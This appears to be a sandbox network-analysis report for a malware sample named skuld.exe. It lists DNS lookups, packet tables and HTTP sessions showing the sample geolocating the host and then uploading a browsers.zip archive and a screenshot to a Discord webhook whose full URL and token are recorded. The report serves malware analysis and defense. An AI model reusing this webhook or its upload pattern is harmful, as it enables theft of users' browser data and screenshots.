                                                                                                                                          Mar 12, 2025 10:41:25.473273993 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256261110 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256798983 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256833076 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256850958 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.256881952 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256928921 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.256943941 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.256992102 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.257042885 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.257090092 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.257090092 CET49755443192.168.2.18162.159.136.232
                                                                                                                                          Mar 12, 2025 10:41:26.257108927 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.257118940 CET44349755162.159.136.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.266241074 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:26.266285896 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:26.266355991 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:26.266654015 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:26.266669989 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.009526968 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.009717941 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.009732962 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.009816885 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.009823084 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.010941982 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.011025906 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.012103081 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.012172937 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.012197018 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.056330919 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.057717085 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.057734013 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.103758097 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.536643028 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.553750038 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.553909063 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.553988934 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.554008961 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:28.554019928 CET49761443192.168.2.18162.159.137.232
                                                                                                                                          Mar 12, 2025 10:41:28.554027081 CET44349761162.159.137.232192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:52.876089096 CET8049705208.95.112.1192.168.2.18
                                                                                                                                          Mar 12, 2025 10:41:52.876178026 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:52.876204014 CET4970580192.168.2.18208.95.112.1
                                                                                                                                          Mar 12, 2025 10:41:52.880888939 CET8049705208.95.112.1192.168.2.18
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Mar 12, 2025 10:40:45.085470915 CET | 59856 | 53 | 192.168.2.18 | 1.1.1.1
Mar 12, 2025 10:40:45.092153072 CET | 53 | 59856 | 1.1.1.1 | 192.168.2.18
Mar 12, 2025 10:40:47.816524029 CET | 51790 | 53 | 192.168.2.18 | 1.1.1.1
Mar 12, 2025 10:40:47.825690985 CET | 53 | 51790 | 1.1.1.1 | 192.168.2.18
Mar 12, 2025 10:40:49.212600946 CET | 49277 | 53 | 192.168.2.18 | 1.1.1.1
Mar 12, 2025 10:40:49.222281933 CET | 53 | 49277 | 1.1.1.1 | 192.168.2.18
Mar 12, 2025 10:40:49.301820993 CET | 61289 | 53 | 192.168.2.18 | 1.1.1.1
Mar 12, 2025 10:40:49.309405088 CET | 53 | 61289 | 1.1.1.1 | 192.168.2.18
Mar 12, 2025 10:41:26.258564949 CET | 63130 | 53 | 192.168.2.18 | 1.1.1.1
Mar 12, 2025 10:41:26.265526056 CET | 53 | 63130 | 1.1.1.1 | 192.168.2.18
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Mar 12, 2025 10:40:45.085470915 CET | 192.168.2.18 | 1.1.1.1 | 0x67f2 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:47.816524029 CET | 192.168.2.18 | 1.1.1.1 | 0xc6db | Standard query (0) | ip-api.com | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.212600946 CET | 192.168.2.18 | 1.1.1.1 | 0xe492 | Standard query (0) | api.gofile.io | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.301820993 CET | 192.168.2.18 | 1.1.1.1 | 0x4816 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:41:26.258564949 CET | 192.168.2.18 | 1.1.1.1 | 0x5e62 | Standard query (0) | discord.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Mar 12, 2025 10:40:45.092153072 CET | 1.1.1.1 | 192.168.2.18 | 0x67f2 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:45.092153072 CET | 1.1.1.1 | 192.168.2.18 | 0x67f2 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:45.092153072 CET | 1.1.1.1 | 192.168.2.18 | 0x67f2 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:47.825690985 CET | 1.1.1.1 | 192.168.2.18 | 0xc6db | No error (0) | ip-api.com | | 208.95.112.1 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.222281933 CET | 1.1.1.1 | 192.168.2.18 | 0xe492 | No error (0) | api.gofile.io | | 51.91.7.6 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.222281933 CET | 1.1.1.1 | 192.168.2.18 | 0xe492 | No error (0) | api.gofile.io | | 45.112.123.126 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.309405088 CET | 1.1.1.1 | 192.168.2.18 | 0x4816 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.309405088 CET | 1.1.1.1 | 192.168.2.18 | 0x4816 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.309405088 CET | 1.1.1.1 | 192.168.2.18 | 0x4816 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.309405088 CET | 1.1.1.1 | 192.168.2.18 | 0x4816 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:40:49.309405088 CET | 1.1.1.1 | 192.168.2.18 | 0x4816 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:41:26.265526056 CET | 1.1.1.1 | 192.168.2.18 | 0x5e62 | No error (0) | discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:41:26.265526056 CET | 1.1.1.1 | 192.168.2.18 | 0x5e62 | No error (0) | discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:41:26.265526056 CET | 1.1.1.1 | 192.168.2.18 | 0x5e62 | No error (0) | discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:41:26.265526056 CET | 1.1.1.1 | 192.168.2.18 | 0x5e62 | No error (0) | discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
Mar 12, 2025 10:41:26.265526056 CET | 1.1.1.1 | 192.168.2.18 | 0x5e62 | No error (0) | discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
• api.ipify.org
• api.gofile.io
• discord.com
• ip-api.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.18 | 49705 | 208.95.112.1 | 80 | 7148 | C:\Users\user\Desktop\skuld.exe
                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                          Mar 12, 2025 10:40:47.831756115 CET111OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                          Host: ip-api.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          Mar 12, 2025 10:40:48.297143936 CET175INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:47 GMT
                                                                                                                                          Content-Type: text/plain; charset=utf-8
                                                                                                                                          Content-Length: 6
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          X-Ttl: 60
                                                                                                                                          X-Rl: 44
                                                                                                                                          Data Raw: 66 61 6c 73 65 0a
                                                                                                                                          Data Ascii: false
                                                                                                                                          Mar 12, 2025 10:40:53.252554893 CET95OUTGET /json HTTP/1.1
                                                                                                                                          Host: ip-api.com
                                                                                                                                          User-Agent: Go-http-client/1.1
                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                          Mar 12, 2025 10:40:53.358484983 CET483INHTTP/1.1 200 OK
                                                                                                                                          Date: Wed, 12 Mar 2025 09:40:52 GMT
                                                                                                                                          Content-Type: application/json; charset=utf-8
                                                                                                                                          Content-Length: 306
                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                          X-Ttl: 54
                                                                                                                                          X-Rl: 43
                                                                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 22 55 53 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 59 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 63 69 74 79 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 7a 69 70 22 3a 22 31 30 31 32 33 22 2c 22 6c 61 74 22 3a 34 30 2e 37 31 32 38 2c 22 6c 6f 6e 22 3a 2d 37 34 2e 30 30 36 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 69 73 70 22 3a 22 4c 65 76 65 6c 20 33 22 2c 22 6f 72 67 22 3a 22 43 65 6e 74 75 72 79 4c 69 6e 6b 20 43 6f 6d 6d 75 6e 69 63 61 74 69 6f 6e 73 2c 20 4c 4c 43 22 2c 22 61 73 22 3a 22 41 53 33 33 35 36 20 4c 65 76 65 6c 20 33 20 50 61 72 65 6e 74 2c 20 4c 4c 43 22 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                                                                                                          Data Ascii: {"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.189"}
                                                                                                                                          Mar 12, 2025 10:41:23.363704920 CET6OUTData Raw: 00
                                                                                                                                          Data Ascii:


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.18 | 49704 | 104.26.13.205 | 443 | 7148 | C:\Users\user\Desktop\skuld.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-12 09:40:46 UTC | 94 | OUT | GET / HTTP/1.1
Host: api.ipify.org
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2025-03-12 09:40:47 UTC | 426 | IN | HTTP/1.1 200 OK
Date: Wed, 12 Mar 2025 09:40:46 GMT
Content-Type: text/plain
Content-Length: 12
Connection: close
Vary: Origin
cf-cache-status: DYNAMIC
Server: cloudflare
CF-RAY: 91f255016cb796ee-MIA
server-timing: cfL4;desc="?proto=TCP&rtt=13763&min_rtt=13282&rtt_var=5943&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2816&recv_bytes=709&delivery_rate=169050&cwnd=250&unsent_bytes=0&cid=caf212e1a1364a18&ts=501&x=0"
2025-03-12 09:40:47 UTC | 12 | IN | Data Raw: 37 33 2e 35 37 2e 31 30 31 2e 39 35
Data Ascii: 73.57.101.95


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.18 | 49706 | 51.91.7.6 | 443 | 7148 | C:\Users\user\Desktop\skuld.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-12 09:40:51 UTC | 103 | OUT | GET /getServer HTTP/1.1
Host: api.gofile.io
User-Agent: Go-http-client/1.1
Accept-Encoding: gzip
2025-03-12 09:40:51 UTC | 1146 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.27.1
Date: Wed, 12 Mar 2025 09:40:51 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 14
Connection: close
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: Content-Type, Authorization
Access-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEAD
Access-Control-Allow-Credentials: true
Content-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requests
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: cross-origin
Origin-Agent-Cluster: ?1
Referrer-Policy: no-referrer
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-Content-Type-Options: nosniff
X-DNS-Prefetch-Control: off
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-XSS-Protection: 0
ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"
X-Robots-Tag: noindex, nofollow
2025-03-12 09:40:51 UTC | 14 | IN | Data Raw: 65 72 72 6f 72 2d 6e 6f 74 46 6f 75 6e 64
Data Ascii: error-notFound


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.18 | 49707 | 162.159.136.232 | 443 | 7148 | C:\Users\user\Desktop\skuld.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-12 09:40:51 UTC | 321 | OUT | POST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
Host: discord.com
User-Agent: Go-http-client/1.1
Content-Length: 702
Content-Type: multipart/form-data; boundary=588f6ce998f0ce22e2ac536e8401330f8bfc454e3af5047d21eeaeb6fd57
Accept-Encoding: gzip
2025-03-12 09:40:51 UTC | 702 | OUT | Data Raw: 2d 2d 35 38 38 66 36 63 65 39 39 38 66 30 63 65 32 32 65 32 61 63 35 33 36 65 38 34 30 31 33 33 30 66 38 62 66 63 34 35 34 65 33 61 66 35 30 34 37 64 32 31 65 65 61 65 62 36 66 64 35 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 30 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 6e 6f 72 64 69 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 62 72 6f 77 73 65 72 73 2e 7a 69 70 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 50 4b 05 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0d 0a 2d 2d 35 38 38 66 36 63 65 39 39 38
Data Ascii: --588f6ce998f0ce22e2ac536e8401330f8bfc454e3af5047d21eeaeb6fd57Content-Disposition: form-data; name="file[0]"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\browsers.zip"Content-Type: application/octet-streamPK--588f6ce998
2025-03-12 09:40:51 UTC | 1122 | IN | HTTP/1.1 200 OK
Date: Wed, 12 Mar 2025 09:40:51 GMT
Content-Type: application/json
Transfer-Encoding: chunked
Connection: close
Set-Cookie: __dcfduid=1615d54cff2611efa9d7968e1d4a0ad4; Expires=Mon, 11-Mar-2030 09:40:51 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1741772452
x-ratelimit-reset-after: 1
vary: Accept-Encoding
via: 1.1 google
alt-svc: h3=":443"; ma=86400
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=bBiy5CXbJyhgxYtuIHPZl3FmesYwpSk7T%2Bak7N0mKr76J1Tivt1F4pR0G2rP5pAm2Knxm9NlNQu977wb9bSqYbVtw23zycieaYU2APKVrkwVTfCA6%2BaElFEXXdZv"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Reporting-Endpoints: csp-sentry="https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stable"
2025-03-12 09:40:51 UTC | 818 | IN | Data Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 6e 6f 6e 65 27 3b 20 64 65 66 61 75 6c 74 2d 73 72 63 20 68 74 74 70 73 3a 2f 2f 6f 36 34 33 37 34 2e 69 6e 67 65 73 74 2e 73 65 6e 74 72 79 2e 69 6f 3b 20 72 65 70 6f 72 74 2d 74 6f 20 63 73 70 2d 73 65 6e 74 72 79 3b 20 72 65 70 6f 72 74 2d 75 72 69 20 68 74 74 70 73 3a 2f 2f 6f 36 34 33 37 34 2e 69 6e 67 65 73 74 2e 73 65 6e 74 72 79 2e 69 6f 2f 61 70 69 2f 35 34 34 31 38 39 34 2f 73 65 63 75 72 69 74 79 2f 3f 73 65 6e 74 72 79 5f 6b 65 79 3d 38 66 62 62 63 65 33 30 62 66 35 32 34 34 65 63 39 34 32 39 35 34 36 62 65 65 66 32 31 38 37 30 26 73 65 6e 74 72 79 5f 65 6e 76 69 72 6f 6e 6d 65 6e 74 3d 73 74 61 62 6c 65 0d 0a 53 65 74
Data Ascii: Content-Security-Policy: frame-ancestors 'none'; default-src https://o64374.ingest.sentry.io; report-to csp-sentry; report-uri https://o64374.ingest.sentry.io/api/5441894/security/?sentry_key=8fbbce30bf5244ec9429546beef21870&sentry_environment=stableSet
2025-03-12 09:40:51 UTC | 798 | IN | Data Raw: 35 34 65 0d 0a 7b 22 74 79 70 65 22 3a 30 2c 22 63 6f 6e 74 65 6e 74 22 3a 22 22 2c 22 6d 65 6e 74 69 6f 6e 73 22 3a 5b 5d 2c 22 6d 65 6e 74 69 6f 6e 5f 72 6f 6c 65 73 22 3a 5b 5d 2c 22 61 74 74 61 63 68 6d 65 6e 74 73 22 3a 5b 7b 22 69 64 22 3a 22 31 33 34 39 33 31 36 32 30 31 34 30 36 35 32 39 36 30 37 22 2c 22 66 69 6c 65 6e 61 6d 65 22 3a 22 62 72 6f 77 73 65 72 73 2e 7a 69 70 22 2c 22 73 69 7a 65 22 3a 32 32 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 64 69 73 63 6f 72 64 61 70 70 2e 63 6f 6d 2f 61 74 74 61 63 68 6d 65 6e 74 73 2f 31 33 34 38 33 32 39 35 33 31 31 34 38 30 37 39 31 30 34 2f 31 33 34 39 33 31 36 32 30 31 34 30 36 35 32 39 36 30 37 2f 62 72 6f 77 73 65 72 73 2e 7a 69 70 3f 65 78 3d 36 37 64 32 61 38 32 33 26 69 73 3d 36
Data Ascii: 54e{"type":0,"content":"","mentions":[],"mention_roles":[],"attachments":[{"id":"1349316201406529607","filename":"browsers.zip","size":22,"url":"https://cdn.discordapp.com/attachments/1348329531148079104/1349316201406529607/browsers.zip?ex=67d2a823&is=6
2025-03-12 09:40:51 UTC | 567 | IN | Data Raw: 78 74 2d 31 2e 64 69 73 63 6f 72 64 61 70 70 2e 6e 65 74 2f 65 78 74 65 72 6e 61 6c 2f 77 37 47 59 48 38 65 63 7a 63 43 72 61 65 48 78 32 6c 4c 71 39 6a 31 67 54 44 5a 7a 4d 32 56 42 77 35 41 4c 68 51 64 62 5a 76 59 2f 25 33 46 76 25 33 44 34 2f 68 74 74 70 73 2f 61 76 61 74 61 72 73 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 75 2f 31 34 35 34 38 37 38 34 35 22 7d 7d 5d 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 35 2d 30 33 2d 31 32 54 30 39 3a 34 30 3a 35 31 2e 34 37 34 30 30 30 2b 30 30 3a 30 30 22 2c 22 65 64 69 74 65 64 5f 74 69 6d 65 73 74 61 6d 70 22 3a 6e 75 6c 6c 2c 22 66 6c 61 67 73 22 3a 30 2c 22 63 6f 6d 70 6f 6e 65 6e 74 73 22 3a 5b 5d 2c 22 69 64 22 3a 22 31 33 34 39 33 31 36 32 30 31 33 30 35 36 30 38 32 37
Data Ascii: xt-1.discordapp.net/external/w7GYH8eczcCraeHx2lLq9j1gTDZzM2VBw5ALhQdbZvY/%3Fv%3D4/https/avatars.githubusercontent.com/u/145487845"}}],"timestamp":"2025-03-12T09:40:51.474000+00:00","edited_timestamp":null,"flags":0,"components":[],"id":"134931620130560827
2025-03-12 09:40:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.18 | 49755 | 162.159.136.232 | 443 | 7148 | C:\Users\user\Desktop\skuld.exe
Timestamp | Bytes transferred | Direction | Data
2025-03-12 09:41:25 UTC | 323 | OUT | POST /api/webhooks/1348329799772405922/9M5Ip-UwI2E-RbEuavliXkxmbDrNISUsPSueTCkwz7rQ0ShxJDLxEcHc2J1j85aQHNbw HTTP/1.1
Host: discord.com
User-Agent: Go-http-client/1.1
Content-Length: 66661
Content-Type: multipart/form-data; boundary=1f52b4de3edcfd4971268313d9c91190027d2626bf5fa132aba29cc954f0
Accept-Encoding: gzip
2025-03-12 09:41:25 UTC | 863 | OUT | Data Raw: 2d 2d 31 66 35 32 62 34 64 65 33 65 64 63 66 64 34 39 37 31 32 36 38 33 31 33 64 39 63 39 31 31 39 30 30 32 37 64 32 36 32 36 62 66 35 66 61 31 33 32 61 62 61 32 39 63 63 39 35 34 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5b 30 5d 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 6e 6f 72 64 69 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c 5c 5c 54 65 6d 70 5c 5c 76 77 37 54 77 58 31 54 4e 31 5c 5c 44 69 73 70 6c 61 79 20 28 31 29 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00
Data Ascii: --1f52b4de3edcfd4971268313d9c91190027d2626bf5fa132aba29cc954f0Content-Disposition: form-data; name="file[0]"; filename="C:\\Users\\user\\AppData\\Local\\Temp\\vw7TwX1TN1\\Display (1).png"Content-Type: application/octet-streamPNGIHDR
                                                                                                                                          Data Ascii: @2b?o[5fT@?YWvn2R ?)-kU?O8@Bdy_UMmKjZdS_?U}d/W,_*7g\R30q Cq1lr_v63;oU_KoYrl)HP_=pjYv,^:n31\iC>O
                                                                                                                                          2025-03-12 09:41:25 UTC7116OUTData Raw: ca bf fe 22 b3 3e b6 8e 59 71 b5 d4 3b f9 00 df bd 6a 9b 01 03 06 d8 a1 56 20 cc 8a 19 68 29 4e a8 a5 d6 83 bf 69 a7 b7 2d 6b d6 ae 95 55 ab d7 78 ac 96 55 ab 56 4b a1 65 dd ba f5 d2 a1 63 47 63 9f 6a 2b c6 0a 00 00 00 00 00 20 29 c6 62 42 46 5e 7f a8 c8 0b 47 8b bc 7a a4 c8 9b 87 8b b4 b2 b6 db 1f 22 f2 b6 1d 02 ca c0 3f 88 bc 7b 98 b5 fc 8b 48 ef d3 e5 d5 ab ed 99 79 8d 0e f9 bb f4 3c fd 73 19 73 de 32 c9 cf 59 21 e3 72 56 ca 78 8b 5a aa 6d 55 1f 73 e1 cf 32 fd 91 f7 65 fd d8 bb 45 e6 39 bf 0b f8 b3 45 fd 36 60 28 10 6c a4 67 ff e9 00 f0 97 cb ac fd 97 4b 87 97 4f 91 5d 4b af 92 59 e3 72 22 fa 5b 9b f4 ef df df 10 6a d9 a1 55 d4 50 cb da b6 67 b0 85 03 2d 53 a8 a5 b6 fd ca a4 b4 b4 4c 4a 2c 15 15 3b a4 43 5e 66 85 5a 8c 15 00 00 00 00 00 40 52 8c c5 b8
                                                                                                                                          Data Ascii: ">Yq;jV h)Ni-kUxUVKecGcj+ )bBF^Gz"?{Hy<ss2Y!rVxZmUs2eE9E6`(lgKO]KYr"[jUPg-SLJ,;C^fZ@R
                                                                                                                                          2025-03-12 09:41:25 UTC8302OUTData Raw: 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00 00 00 00 64 07 63 11 00 00 00 00 00 00 40 76 30 16 01 00 00 00
                                                                                                                                          Data Ascii: dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0dc@v0
